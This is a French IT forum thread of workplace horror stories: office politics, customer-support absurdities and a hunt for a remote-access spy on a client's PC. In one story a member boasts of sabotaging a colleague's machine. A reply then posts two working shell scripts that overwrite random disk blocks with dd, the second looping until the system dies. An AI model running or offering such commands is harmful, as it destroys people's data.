En gros, le profil de l'ingénieur étranger dans la finance qui a frappé son collègue japonais, sous le coup de l'énervement, ça avait paru crédible à la police. (Et le pire c'est que c'est statistiquement vrai) Vous l'aurez compris, le monsieur a décidé de se venger très bassement.
Je vous épargne tout le détail du dialogue avec les képis, il suffira de dire que je n'ai pas drop une seule seconde le niveau de politesse avec ces messieurs de la police, qui se sont du coup demandé si ils avaient bien le bon mec, puisque j'insistais sur le fait que je n'avais pas besoin d'un traducteur, et que je n'avais jamais levé la main sur ce monsieur. A l'inverse, lui, par contre...

Ils ont au départ refusé de prendre le témoignage de mes collègues, prétextant une complicité... Jusqu'à ce que je rappelle qu'on a une agence externe de sécurité qui avait reçu l'ordre de ne pas laisser le monsieur revenir. Là, ils ont commencé à se bouger... Jusqu'à ce que la secrétaire du CEO appelle la banque pour leur sonner les cloches et leur dire clairement "vous êtes mauvais, vous avez même pas envisagé que le consultant japonais ait pu mentir dans sa déposition ? Il n'y a pas eu de violence, vous avez un témoignage objectif pour le prouver, alors vous allez être gentils et vous allez nous rendre notre ingénieur".

Ca s'est fini avec un procès entre la banque et le monsieur.

La même journée j'ai eu un triple combo :
- Les flics (ci-dessus)
- Réunion de projet pour la "gestion standardisée des comptes UNIX" : installer du SSH1 partout, avec la faille de sécurité si connue. J'ai menacé de démissionner si je n'avais pas une déclaration signée d'huissier que mon cerveau en tant qu'ingénieur n'avait rien à voir dans la décision. :shouko:
- Réunion de staffing où je disais que j'en pouvais plus d'être le seul ingénieur restant, c'était trop dangereux pour la boîte et où on m'a répondu : "allons, voyons, tu te débrouilles très bien tout seul, non ? Tiens bon encore un peu." -> ma réaction après le cumul de tout ça ? :x

Neo, you are the (SSH) One. / A quoi il sert ce user ?

La boîte se trimballait une pléthore d'UNIX, des Solaris, des AIX, des HP UX, des Linux, des OpenBSD, des FreeBSD... Et les comptes n'étaient pas synchronisés.
Quelqu'un a donc proposé un projet à 100MY de yens pour fabriquer un soft qui synchroniserait tout. :azusa3:
Avec dix millions de yens par type d'UNIX supplémentaire à gérer. :azusa3:

Les mecs avaient aussi une lubie, lister tous les comptes UNIX dans /etc/passwd, et faire un plan pour retirer tout ce qu'ils connaissaient pas et qui donc ne servait à "rien". Mééééé bien sûr. :kanie: :azusa:
"Et à quoi il sert le compte daemon ? Et nobody ? Et root ? :wat: Et sys ? Et uucp ?"
Bref, un désastre qui se préparait.

J'avais fabriqué dans mon coin une panoplie de scripts shell capables de créer des comptes depuis l'Active Directory, et faire l'authentification SSH en Kerberos via Active Directory, avec une option d'authentification locale à base de clé SSH stockées dans le domaine aussi. Et quand j'ai proposé ça et que j'ai dit que ça annulait le besoin du projet à 100MY, les chefs sont devenus verts de rage ("Ah. Backchiche spotted."), que je me mêlais de ce qui ne me regardait pas, et que c'était intolérable qu'un vulgiare ingénieur se permette ce genre d'initiative. >__<

Bref, c'est là qu'ils ont tenté de m'imposer une version de SSH1... proposée comme par hasard par la même boîte, tiens.
-"Donc voilà, on va utiliser ton idée, mais tu vas remplacer OpenSSH par SSH1 partout."
-"...Hors de question. C'est un risque de sécurité inacceptable et-" :shouko:
-"Comment ça 'hors de question' ? C'est un ORDRE ! Tu VAS le faire". :fu:
-"Non." :serious:
-"C'est de l'insubordination, c'est ça ?" :branle:
-"Non, c'est juste que en tant qu'ingénieur je ne peux pas cautionner une décision pareille." :shouko:
-"On en a rien à faire de ton avis d'ingénieur, tu VAS le faire !" :akiho:
-"Non. Ou alors vous signez une déclaration stipulant que je n'ai été qu'exécutant, que je vous ai avertis des risques, et que mon cerveau et ma volonté n'ont aucun rapport avec ce projet." :keima:
-"Comment ça déclaration d'huissier, pour qui tu te prends ?!" :ringo3:
-"Formulons la chose autrement : si vous ne me donnez pas cette garantie, je démissionne tout de suite, et vous parlerez à mon avocat." :keima:
-"Quoi ?" :shiori:
-"Il vous en faut plus ? Je ne veux pas être là quand vous vous ferez défoncer encore plus profondément que Sony avec le Playstation Network. Libre à vous de devenir le successeur de Sony, mais moi je ne veux rien avoir à faire avec ça." :rin2:

Et LA, j'ai vu aux réactions dans leurs yeux qu'ils commençaient à réaliser que je ne cherchais pas à foutre en l'air leur agenda pour le plaisir, et qu'ils touchaient à quelque chose de tellement dangereux que je sortais la carte "avocat", sortant du technique pour passer au juridique.
tl;dr: j'ai contourné une protection physique de serveur à l'aide d'une fourniture de bureau présente en abondance dans n'importe quelle entreprise. :himari2:
Ah, ça, ça me fait penser à la fois où un de nos gugusses de la gestion du bâtiment avait eu une lubie et nous a empêchés d'entrer dans l'étage datacenter, de telle heure à telle heure. Comme par hasard un jour où j'avais besoin de bosser sur une cochonnerie de truc legacy pas connecté au reste du réseau.
Juste avant le blocage, j'ai ramené un PC en bas, mis un dongle Wi-Fi au cul de la machine pour continuer à bosser, depuis la porte d'entrée du datacenter.

Ceci venait après justement une autre affaire très mignonne...

Trop de sécurité tue la sécurité

Un jour, les mecs du département "gestion du bâtiment" ont eu une lubie pour pourrir la vie à l'informatique.
Il faut savoir, on avait déjà un capteur qui vérifiait l'iris pour valider l'entrée dans le datacenter, et un sas, et un garde externe qui surveillait.
On peut dire qu'on avait pas forcément vraiment besoin de plus.
Mais ça ne les a pas empêchés...

DE TESTER UN DETECTEUR DE METAUX A L'ENTREE DU DATACENTER :homer: :non:
Pendant les heures de business !! :evil:

Arriva ce qui devait arriver pendant le test, un serveur était tombé en panne et il fallait remplacer son disque et le faire repartir.
Sauf que, l'équipe testait le détecteur de métaux à ce moment-même, il était genre ... 14H.

Il y avait une poufiasse finie qui supervisait les opérations, le genre coincée du cul "tu es de la merde", "je te prends de haut".

-"Euh, je peux entrer ? On a une urgence" :sayako:
-"Non, les tests ne sont pas finis." :akiho:
-"C'est une urgence, il y a une réparation à faire !" :ringo3:
-"Et bien passez le détecteur de métaux" :coach:
-"...Je dois amener un disque dur à l'intérieur !" :kanie:
-"Je m'en fiche, passez le détecteur." :rondoudou:

Evidemment, ça ne passe pas. Et surtout, le détecteur n'est pas débranchable tant que les tests ne sont pas finis, le seuil n'est pas réglable, et le programme pas désactivable non plus tant que c'est branché parce que ce serait trop compliqué. :ohana: :x :objection: :mad:

Et là, j'ai snap. :hirano: :kanako:
J'ai porté la main à la ceinture, et j'ai commencé à retirer mon pantalon (jeans, avec les bouts en métal et tout le bordel). :kanako:
La poufiasse de service du bâtiment évidemment se met à péter un cable.
-"Mais, MAIS, MAIS QU'EST-CE QUE VOUS FAITES ??" :yuno:
-"Je trouve des solutions, vous voulez pas ou vous pouvez pas couper ce détecteur, et moi je dois rentrer." :coach:
-"Mais enfin ! o_o" :sayako:
-"Ecoutez, il y a pour 20 millions de yens de matos qui doit être réparé là-derrière, c'est vous qui allez payer si on peut pas les réparer ?" :ringo3:

Je pariais sur la chance qu'il y ait aussi un stock de disques durs de l'autre côté pour faire ma réparation.
Je suis donc rentré en slip dans le datacenter, et la sécurité s'est totalement bidonnée en voyant ça.
Et j'ai gagné mon pari, il y AVAIT des disques de stock de l'autre côté. XD
Membre d'Epitanime depuis 2000 (EPITA Promo 2005 SRS)
Informaticien expatrié, traducteur à ses heures perdues

Avatar du membre
Corsaire
Début de la gloire
Messages : 27
Enregistré le : ven. févr. 06, 2015 7:16 am

Re: Les ordinateurs de l'HORREUR

Message par Corsaire »

Black OPS

Cette fois je vais verser dans le coté obscur de la force, les trucs interdits par la morale voire les règles de l'entreprise mais que l'on doit faire pour mettre fin a une situation problématique. :snake:

A l’époque je bossais dans une université, l'un de mes tafs était de faire des masters de Systèmes (Windows, Linux, OSX) pour la rentrée a venir.

Qui dit université dit petits cons d’étudiants bien sur, mais aussi pléthore de softs a la con pour faire les cours, il faut s'assurer que tout marche bien a la conception du master, car une fois répliqué en centaines d'exemplaires un oubli ou un dysfonctionnement deviennent une horreur.

Je créé donc une machine de test de mon produit que je met a disposition des profs pour qu'ils fassent tourner leurs batchs de données et leurs cours dessus pour assurer que tout marchera a la rentrée. :yeah:

Mission accomplie, la rentrée se fait, je fais un mail pour dire que je vais passer récupérer le bousin... :lunettes:

Et la c'est le drame :misaka2:

La machine de tests est devenu le poste attitré de Mr Connard (appelons le ainsi), et il est désormais absolument hors de question de la retirer. :kiddingme:

J'en réfère a mon chef qui me dit de laisser tomber, on a d'autres chats a fouetter (vrai, en pleine rentrée c'est assez sport).

Sauf que... le problème dure, je tente de récupérer le truc plusieurs fois sans succès, je ne suis pas soutenu par ma hiérarchie qui voit ça comme un hochet refilé a un bébé pour qu'il arrête de casser les pieds (pas faux car Mr Connard est loin d'en être a son coup d'essai de trucs tordus).
La machine entame sa seconde année... :pokerface:

Notre université est classée bien évidement en ERP (Etablissement Recevant du Public) ce qui est synonyme de coupure électrique pour test mensuel.
Tout le monde est censé le savoir, ça a toujours été ainsi depuis des décennies, et il faut en conséquence éteindre sa machine le premier lundi du mois, je vous laisse deviner combien de postes se font scharcler violemment chaque mois...

Dans le lot notre poste "de" Mr Connard, qui vient nous trouver mécontent que "sa" machine se soit faite éteindre violemment en pleine nuit, pasque il y a des données importantes pour l’école dessus vous voyez ...

Vous avez bien lu, le poste de tests tout pourri est devenu une propriété puis un serveur de données critique !! (genre des notes d'examen dessus et joyeusetés) :serious:

Mon sang bout !
J’appelle une connaissance a l'aide pour réaliser une horreur que mon cerveau revanchard ourdit. :shouko:

Le principe ?
On va mettre dans la bécane un script qui se déclenche régulièrement et détruit des bits au hasard sur le filesystem, le poste devenant ainsi au fil du temps de moins en moins stable et des données se corrompent.
Je met en place "la chose" sans soucis, même en ayant change le mot de passe de root j'ai encore accès physique a la bestiole (C'est con hein).
Et je laisse faire. :shiroe:

Au bout d'un moment patatra,
"ça marche puuuu :-?
-ooooooooh, mais comme c'est triste ça monsieur :reggie:
-vous pouvez réparer hein ? :'(
-je regarde, holalalala non pas comme ça, je dois reprendre cette machine en atelier :kyonata:
-ah bon ? :?:
-aaaah, oui monsieur" :rin2:

J'embarque le machin, le met sur l’étagère, dit que le disque dur est mort de chez mort et rien n'est récupérable, et clos le dossier.

Machine récupérée, Mr Connard niqué. :lied:
Ce fut une bonne journée.
Un poing vaut mieux que deux "j'te préviens..."

Avatar du membre
DarkSoul
Membre En Mutation
Messages : 92
Enregistré le : jeu. oct. 13, 2011 2:50 am
Localisation : Japon, Tokyo

Re: Les ordinateurs de l'HORREUR

Message par DarkSoul »

Il Palazzo-sama a écrit :
DarkSoul a écrit :Avec cette petite plaisanterie, le pauvre s'est fait dégager de la team du projet, le lead en a profité pour dire qu'il était incompétent et pas digne de confiance blablabla. :/
Et après y’en a qui osent se plaindre que trop d’histoires finissent bien. :marii9:

Salut en mémoire de tous les soldats tombés au champ d’honneur avant d’avoir appris à se battre. :snake:
Je sais pas si c'est recevable. Le mec avait bossé X années pour Lehman Brothers avant la crise. J'aurais compris pour un étudiant ou un fraichement diplômé, mais pas un mec avec 5 ans d'XP.
Membre d'Epitanime depuis 2000 (EPITA Promo 2005 SRS)
Informaticien expatrié, traducteur à ses heures perdues

Avatar du membre
DarkSoul
Membre En Mutation
Messages : 92
Enregistré le : jeu. oct. 13, 2011 2:50 am
Localisation : Japon, Tokyo

Re: Les ordinateurs de l'HORREUR

Message par DarkSoul »

Corsaire a écrit :Black OPS
J’appelle une connaissance a l'aide pour réaliser une horreur que mon cerveau revanchard ourdit. :shouko:

Le principe ?
On va mettre dans la bécane un script qui se déclenche régulièrement et détruit des bits au hasard sur le filesystem, le poste devenant ainsi au fil du temps de moins en moins stable et des données se corrompent.
CE script ? :DD

Code : Tout sélectionner

#!/bin/sh
# Version 1.0 : 2006/03/21
# Version 1.1 : 2010/06/27
cur_block=0; i=0; while [ $i -ne 2000 ] ; do cur_block=$((cur_block+RANDOM)); i=$((i+1)); dd if=/dev/zero of=$1 bs=1024 count=1000 seek=$cur_block; done
Version améliorée si jamais, qui elle, continue jusqu'à ce que mort s'ensuive :

Code : Tout sélectionner

#!/bin/sh
# Version 1.0 : 2006/03/21
# Version 1.1 : 2010/06/27
# Version 2.0 : 2010/06/27
cur_block=0; while (dd if=/dev/zero of=$(df -h $(which dd) | sed '/^\// !D;s# .*##') bs=1024 count=1000 seek=$cur_block) ; do cur_block=$((cur_block+RANDOM % 51200)); done
Membre d'Epitanime depuis 2000 (EPITA Promo 2005 SRS)
Informaticien expatrié, traducteur à ses heures perdues

Avatar du membre
Shikaze
Début de la gloire
Messages : 20
Enregistré le : mer. sept. 22, 2010 7:15 pm

Re: Les ordinateurs de l'HORREUR

Message par Shikaze »

Petite précision pour ceux qui ont un linux : ne lancer PAS ce script si vous n'avez pas compris ce qu'il fait.
Pour faire simple : ça TUE le disque dur.

Avatar du membre
Nemo
Database
Messages : 3403
Enregistré le : dim. août 30, 2009 9:51 am
Localisation : Dans la Bretagne de Elder Tales
Contact :

Re: Les ordinateurs de l'HORREUR

Message par Nemo »

Best topic sur Thalie ever. Merci beaucoup les gens. :ringo:

Avatar du membre
Il Palazzo-sama
~$ source ~/pédant.sh --verbose 2>var/log/émotions &
Messages : 1032
Enregistré le : sam. mars 19, 2011 5:20 pm
Localisation : Entre Lille et l’Ill
Contact :

Re: Les ordinateurs de l'HORREUR

Message par Il Palazzo-sama »

DarkSoul a écrit :Je sais pas si c'est recevable. Le mec avait bossé X années pour Lehman Brothers avant la crise.
Ah ben si tu donne pas le contexte non plus. :beatrice3:

Du coup, on sort les fourches ? :mio2:
Image
« La violence est le dernier refuge de l'incompétence. »
Salvor Hardin

Avatar du membre
DarkSoul
Membre En Mutation
Messages : 92
Enregistré le : jeu. oct. 13, 2011 2:50 am
Localisation : Japon, Tokyo

Re: Les ordinateurs de l'HORREUR

Message par DarkSoul »

Il Palazzo-sama a écrit :
DarkSoul a écrit :Je sais pas si c'est recevable. Le mec avait bossé X années pour Lehman Brothers avant la crise.
Ah ben si tu donne pas le contexte non plus. :beatrice3:

Du coup, on sort les fourches ? :mio2:
Image
Non mais en fait je l'ai un peu pris en pitié de base, il est venu demander poliment, il était pas méchant et il m'a pas accusé d'avoir saboté son travail. Donc c'est une connerie, oui, c'est pas acceptable, non, mais au moins il a été humainement correct.
Membre d'Epitanime depuis 2000 (EPITA Promo 2005 SRS)
Informaticien expatrié, traducteur à ses heures perdues

Avatar du membre
Nefka
Ce membre a épuisé les rangs du forum
Messages : 1242
Enregistré le : mar. déc. 14, 2010 10:51 am
Localisation : DTC

Re: Les ordinateurs de l'HORREUR

Message par Nefka »

Jeff Vimes a écrit :
Dans le temps, j'étais installé sur le toit d'une gare parisienne.
Tiens, je ne suis pas le seul a etre passé par le credit agricole a Montparnasse?
Vous aussi ? :rin2:

Avatar du membre
Fl4v1en
Commence à jouer en mode Normal
Messages : 33
Enregistré le : mar. mai 24, 2011 1:10 pm

Re: Les ordinateurs de l'HORREUR

Message par Fl4v1en »

Bon, voici 2012.
j 'ai refait le test avec un autre disque dans le boîtier et le problème est le même ainsi que le test sur deux pc différent,le disque a été reconnu par l'ordi mais des que l'on éteint le boitier il n'est plus reconnu (avec le nouveau disque dur)
Oui oui. TL;DR, si il coupe l’interrupteur de son boîtier de HDD externe, ben camarchepu.
Bonjour, j'ai bien reçu ma commande (je n'ai pas encore connecté le lecteur à l'ordinateur pour vérifier son bon fonctionnement), en revanche, je m'interroge sur la présence dans le colis d'un rasoir Wilkinson Sword Hydro 5 que je n'avais pas commandé, et que d'ailleurs vous ne vendez pas. Si l'un de vos employés a égaré son rasoir, vous pouvez lui dire que c'est moi qui l'ai.
Oui, nous avions envoyés durant quelques temps des razoirs jetables en bonux dans nos colis pour un campagne jointe avec Wilkinson.
les casques dr dre sont ils des originaux?? il parait qu'il existe enormenent de contre facon
Oué, bosser dans un grande enseigne et vendre du HK :O
Ayant fait du développement système dans des calculateurs de turbines aéronautiques notamment ( en essai en vol ), j'estime avoir une idée du fonctionnement d'un processeur, et cette expérience me laisse penser que ce processeur n'aurait jamais dû passer les tests chez AMD.
Alors, cas très particulier.
Le type nous à fait chier durant une longue période, nous traitants d'incapables et autres joyeusetés car son proco avait une histoire de surchauffe et de fréquences pas tenues.
Oeuf Corse, rien chez nous.
Puis nous avons découvert par la suite que le type avait laissé entre le proco et le rad la mousse rose qui à l'époque servait à protéger les pins proco, imbibé de pâte thermique. :musume:
BONJOUR JAI VUE MA COMMEDE QUE C A A TANTE DE JUSTICAFI C COI QUI VAUX DONNAI MERSI
Traduction: J'ai vu que ma commande est en attente de justificatifs. Que quels sont les documents que je me dois de vous communiquer ?
BONJOUR JAI PAS RSU MON PORTABLE ENCOR JE LA TANT VOUS A VAI LE NUMERO DU COLI MEERSI
bonjour jé un probléme pour vou fére pasé les justifikatif pour finire ma komende je narive pa
a me sérvire de votre lien
je sui en mision en dehore de la frense ma konéksion né pa supére pourié vou me fournire un
lien pour vou fére parveunire les dokumen demender
Polaroid phone proz500,
Avez voussoirs le clavier qwartz?
Missa pas avoir clavier de pierre.

Puis le retour de Cedric :??:
Image
Image
Image
salut je vous écrire encore aujourd'hui sais pour mon disque dur qui est encore tomber encore panne je ne sais pas comment sais tomber en panne je ne sais pas si sais vous qui envoyer disque dur défectueux pour moi le disque dur était brancher dans boitier externe je regarder un film sur ma télé un jour sa arrêter de fonctionner je me suis que sais pas le disque dur qui mort vue qu'il est neuf alors j'ai brancher mon disque dur sur mon pc je les brancher en interne sur ma carte mère ban! le disque dur ne fonctionne pas et je commence avoir marre j'ai plein disque chez moi ils fonctionnes touts bien mes disque dur sont des western digital, des Samsung ils fonctionne touts bien depuis presque 2 ans que les eux et j'ai jamais ù de problème avec eux alors j'ai de prendre une autre masque j'ai un Seagate pour voir si sais un bon disque dur et aparement sais pas la cas je suis déçu alors je vous avois encore le disque dur et en espèrent que vous allé fait un effort pour moi parce-que je commence avois marre chaque foie envoyer mon disque en S.A.V merci de votre compréhension
Je suis à la recherche d'un écran 24" en 1920x1200 (16/10) à prix serré.
Mes utilisations principales seront Bureautique, Internet et Photo, un petit peu de filmx et
rarement des jeux.
Notez que dans le genre, un type au téléphone qui me dit texto quand je lui demande quelle utilisation il allais avoir de sa machine (pour que je lui trouve un truc adéquat) me sort "musique, bureautique, internet et youporn". Y'a eu un sacré blanc après ça :D

Puis re-retour de Cedric
Image
Salut , J'ai une tour Acer aspire avec un cle wifi (pour capter le wifipasque non integre) et enfaite au lieu de faire un Tala a la detection sa me fait un talatala .. Et rien se passse .
merci de me faire un avoir complet je choisirait autre chose et pour info vous etes des enculé quand javais commandé le 11 tout eté en stock
je vais vous faire une pub de pute meme cdiscount son mieu que vous vous netes que des batard enculé fils de pute et je reste gentil car je pourrait aller encore plus loin donc aprenez a recpecter les gen vous auiorz pu appeler deja sa aurit été mieu on ait pas des chien par compte compter sur moi je vai vous faire une pub sur facebook on va san rapeler



bande de batard!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ps: vou ne pouvait immaginait comment ma colere et grande c sans arret avec vous les probleme jattend toujour mon imprimante !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Nous étions juste en rupture de stock sur une manette Xbox 360. :shiori:
j'ai un samsung galaxy s3 qui a été commandé, depuis hier le flash de l'appareil photo reste allumé et ce même si j'éteins l'appareil ou si j'enlève la batterie
Message envoyé par le client
--------------------------------------------
Votre sav est médical serieux
J'en ai donc conclus à une barrette de mémoire défaillante.

Aucun MEMTEST n'a été réalisé sur des barrettes de RAM vivante. Je suis un fervent protecteur de la condition des machines.
Lui, c'est drôle :D

Voili voilou pour 2012.
Désolé.....

Avatar du membre
Corsaire
Début de la gloire
Messages : 27
Enregistré le : ven. févr. 06, 2015 7:16 am

Re: Les ordinateurs de l'HORREUR

Message par Corsaire »

dans la série L'enfer c'est les autres

J'ai parlé dans un post du collègue branleur que j'ai allumé, on l’appellera "gaucho" en raison de ses penchants politiques et façon de penser a deux balles.

Que je brosse le portrait, ça donne une idée du bon environnement de travail, et du niveau des équipes.:danse:

Je résumerais en disant que le pognon coulait a flot dans les années qui ont précédé ma venue, que ceux qui étaient a la tête du service informatique ne savaient pas ce que voulait dire "faire de l'informatique" avec des mots comme infrastructure, salle serveurs, et consorts, et que par conséquent ce "service informatique" a été comme une lampe allumée dehors en été qui attire le chikungunya et autres cancrelats... :azusa3:


Un exemple raconté par un des ingénieurs (pas le même bureau et eux sont clean et bosseurs) fut quelque temps avant ma venue le pataquès suivant, il est passe dans le bureau des techos faire une annonce :
"attention je reboote le serveur proxy, la connexion internet va être coupée une minute si vous avez des appels c'est normal :yeah:
-non non non non non, pas maintenant je cherche mon chat ! :espion:
-... je... de... pardon ? :kiddingme:
-je cherche mon chat !
-... quoi ?!" :pokerface:
Un de ces bozos était en train de chercher son familier dans Ultima Online... pendant les heures de bureau.
:claque:

J'ai déjà parle de mes créations de documentations faits apparemment "pour le plaisir" puisque ça c'est MA procédure.
Comprendre "tu veux nous imposer des trucs, t'es nazi c'est ça ? beuh, je suis liiibre moi" (vous le sentez le gauchisme bobo-anarcho-intello la ?) :melenchon:
Les docs sont sur un site interne un peu façon wiki, l'important c'est que ça marche en HTML et est accessible partout.

Je me suis bien sur plains a ma hiérarchie plusieurs fois de travaux non réalisés dans les règles de l'art que j'ai du reprendre, mais on avait un chef qui se foutait éperdument des émoluments des uns et des autres tant que le boulot était fait, quitte a trouver un gogo pour refaire un truc dégueulasse... (jouer au psy ça fatigue il est vrai)

Un jour cependant j'ai bu du petit lait, le chef a donné au gaucho un boulot a faire un peu élevé qui nécessitait de suivre une procédure écrite.
Pour le coup c’était le chef lui même qui l'avait rédigé.
Le chef arrive dans le bureau et dit a gaucho :
"je t'ai mis un dossier pour l'installation d'un soft, j'ai mis la doc dans le serveur de documentation
-heuuu, c'est ou ça le serveur de documentation ?
-... pardon ? :edge:
-bin oui, c'est ou ? :askthat:
*moi en mode se retenir très fort d'exploser de rire* :yoshitake2:
-tu te fous de moi la ? :serious:
-bin heu... je... non quoi"

S'en suit une bonne petite leçon des famille a propos de l'utilisation des outils internes.
Gaucho est bien sur fâché, mais c'est pas fini.

Gaucho prend un post-it et commence a noter des trucs, mon chef re-tique :
"heu, tu fais quoi la ? :misaka2:
-bin je prend des note sur comment installer ce truc :rosa2:
-... sur un post-it ?
-bin oui
-sur un putain de post-it ? :kiddingme:
-... *sent qu'il a dit une connerie*
-et le site qui est accessible de partout avec un simple putain de navigateur c'est fait pour les chiens ?!" :fu:
*moi en mode plié en deux sur la chaise les mains sur la bouche les larmes aux yeux* :gilgamesh:

Gaucho est parti sur site colère, pas grave ça lui fait la bite.

Mieux, après avoir quitté ce boulot depuis un an, mais gardant des contacts avec les ingénieurs je passe leur faire un petit coucou.

L'un d'eux me raconte le chef passé un jour dans leur bureau en mode facepalm. :kuroko2:
Il a eu la (mauvaise) idée de vouloir encore donner un boulot (une chance ?) a gaucho.

"tu regardera le dossier que je t'ai affecte rapidement s'il te plait, le TT1234, c'est assez urgent
-c'est quoi ca TT machin ? :yoshii2:
-..." :death:

Pour info les dossiers sont gérés par un CRM genre redmine ou salesforce et tous les dossiers ont un numéro commençant par TT (ça a été fait comme ça cherchez pas), et on utilise ce système depuis plus de 5 ans...

comment on doit comprendre ça ? Je me demande encore...
Un poing vaut mieux que deux "j'te préviens..."

Avatar du membre
Nemo
Database
Messages : 3403
Enregistré le : dim. août 30, 2009 9:51 am
Localisation : Dans la Bretagne de Elder Tales
Contact :

Re: Les ordinateurs de l'HORREUR

Message par Nemo »

Corsaire a écrit : (vous le sentez le gauchisme bobo-anarcho-intello la ?) :melenchon:
Non, par contre bizarrement tes remarques dans le genre respirent pas l'intelligence mais ont plutôt l'odeur de la connerie diffuse.

Avatar du membre
Little Yokai
Angst Addict
Messages : 2218
Enregistré le : mar. sept. 21, 2010 12:22 am
Localisation : Rapture
Contact :

Re: Les ordinateurs de l'HORREUR

Message par Little Yokai »

Attention à ne pas confondre "histoires d'ordinateurs de l'horreur impliquant des utilisateurs de l'enfer" avec "Histoire de collègues boulets qui branlent rien sur lesquels on se défoule indirectement" :minorin4:

Parce que sinon j'aurais trop de trucs à raconter, ah ah oTL...

Avatar du membre
Corsaire
Début de la gloire
Messages : 27
Enregistré le : ven. févr. 06, 2015 7:16 am

Re: Les ordinateurs de l'HORREUR

Message par Corsaire »

Nemo a écrit :
Corsaire a écrit : (vous le sentez le gauchisme bobo-anarcho-intello la ?) :melenchon:
Non, par contre bizarrement tes remarques dans le genre respirent pas l'intelligence mais ont plutôt l'odeur de la connerie diffuse.
Je crains que tu n'aie pas saisi l'ironie.

Le profil typique du gaucho est la propension a user de ces citations de grands hommes ou mettre en avant des grands combats avec les mots intelligents qui les accompagnent pour faire valoir leur point sans rapport aucun, mais ça fait joli.
En l’occurrence ici j'avais un prototype parfait qui a même réussi a se brouiller avec son syndicat... j'invente rien.

Bref on peut faire aussi des mots valises qui font impressionnants mais ne veulent rien dire, dont acte.

Toujours est il que ce n'est pas le lieu pour lancer une critique de style.
Un poing vaut mieux que deux "j'te préviens..."

Avatar du membre
Corsaire
Début de la gloire
Messages : 27
Enregistré le : ven. févr. 06, 2015 7:16 am

Re: Les ordinateurs de l'HORREUR

Message par Corsaire »

Little Yokai a écrit :Attention à ne pas confondre "histoires d'ordinateurs de l'horreur impliquant des utilisateurs de l'enfer" avec "Histoire de collègues boulets qui branlent rien sur lesquels on se défoule indirectement" :minorin4:

Parce que sinon j'aurais trop de trucs à raconter, ah ah oTL...
Même si les collègues sont du même niveau que les users ? :kanako2:
Un poing vaut mieux que deux "j'te préviens..."

Avatar du membre
Jaerdoster
Nico-Niconasse
Messages : 3042
Enregistré le : dim. avr. 18, 2010 1:16 am

Re: Les ordinateurs de l'HORREUR

Message par Jaerdoster »

Tadam, lundi, bientôt midi, j'ai de l'avance sur mon travail et donc, story time !

Auto-entrepreneur c'est toujours drôle, car on reçoit des appels bizarres, et ça mène a des situations totalement imprévisibles. Parfois même a lutter contre les fantômes :ghostbuster:

Du coup, story time du jour ou j'ai exorcisé un fantôme.

Histoire 4: SOS Fantômes

Je reçois un mail sur ma boite pro: "Demande de rendez vous, problème d'ordinateur"

Le texte est assez vague, avec demande de rappel. Une fille plutôt jeune (30 ans peut être ?), que nous appellerons Miss Lingerie, me réponds au téléphone en disant qu'elle a un problème avec son ordinateur, et que ça la gêne alors qu'elle travaille sur son book.

Du coup, rendez vous, j'y vais car j'avais pas grand chose à faire (en journée j'avais pas toujours des rendez vous, souvent plus le soir) et j’atterris dans un de ces greniers que l'on ose appeler appartement à Paris, et tombe sur une nana plutôt mignonne, mais pas trop mon genre, le genre blonde russe qui a oublié de manger depuis six mois. :yui3:
Miss Lingerie saute direct au plat principal et m'explique qu'elle veut faire du mannequinat, fait son book elle même, mais qu'elle a des problèmes bizarres sur son ordinateur, et elle pense qu'il est hanté.

Moi: "Hanté ?" :inaba:
M.L.: "Oui, il fait des choses tout seul."

Du coup, on va à son ordinateur, et immédiatement me fait: "vous voyez ça recommence !" :yukino4:

Et là ouais, je vois un beau "clic droit copier", changement de fenêtre, "clic droit coller" dans imgur, depuis les jolies photos de la demoiselle en petite tenue (sans doute un book pour de la lingerie, ais-je supposé) :kanako2:

Oh putain de.... je réagis immédiatement et débranche la box qui était a proximité, perte d'internet, plus de fantôme. :musume:

Son putain de fantôme a une session de prise en main à distance d'ouverte sur l'ordinateur, avec un logiciel espion style TeamViewer en plus discret. Du coup, j'explique à M.L. ce qui se passe, et là elle devient furax et me demande si on ne peut pas intercepter ce pervers.

Et moi: "C'est possible mais c'est pas forcément simple. Faut le pousser a l'erreur. J'ai peut être une idée" :coach:

Première tentative: "Subtilité relative"

Je bloque des dizaines d'adresse type imgur.com, et rebranche la connexion, et fait comme si de rien n'était genre rien a bougé, du coup il a du penser a une déconnexion internet. On attend et on observe ces tentatives d'accès a imgur puis imageshack sans succès, avant de laisser tomber, se connecter a gmail et s'envoyer un mail.
Manque de pot, l'adresse mail est un truc du genre "killernaruto666@gmail.com", ça aide pas. Ou peut être que...

Seconde tentative: "La séductrice maléfique"

M.L. me dit qu'elle a une idée pour lui mettre la main dessus, et me sors un plan qui n'a aucune chance de marcher, sauf si le mec en question est stupide. :yukino4:

Elle ouvre son navigateur, reprend le mail qu'il vient de s'envoyer et écrit simplement: "Je sais que tu utilises mon ordinateur pour récupérer des photos de moi. Pourquoi ne pas plutôt me voir en vrai ? Appelle moi." Suivi de son numéro de téléphone.

Pendant ce temps, je me dis que c'est des conneries, qu'il va jamais appeler, et là le téléphone de M.L. sonne. :yukino4:

Cet abruti a vraiment appelé. :kanako2:

Et donc elle regarde l'appelant, fait "oh d'accord", décroche et discute 3-4 minutes avec lui toute gentillette, genre "Ah mais ouais, je me souviens de toi, tu es plutôt mignon, on devrait se voir demain", et convient d'un RDV dans un bar

Puis elle raccroche.

M.L.: "Je vais tuer ce pauvre abruti, vous voulez m'aider ?" :sue:
Moi: "Pas trop, mais je connais quelqu'un qui peut" :lisbeth:

Et j’appelle Nounours.

Nounours, de son vrai prénom Tristan, est un gentil monsieur. Vous voyez John Café dans la Ligne Verte ? Bah c'est le même modèle mais en blanc.
Et Nounous est un grand justicier. Ou il aime casser des têtes, j'ai jamais su. :homura:

Je lui explique le deal, et il me dit "Je suis dispo à 17h."

L'histoire s'arrête pour moi là, je tue le process espion, qui avait visiblement été installé en prenant directement la main sur le poste, et M.L. m’explique qu'il y a surement eu accès a une soirée commune, vu qu'elle avait emmené son PC pour montrer des photos de ses vacances au Brésil.

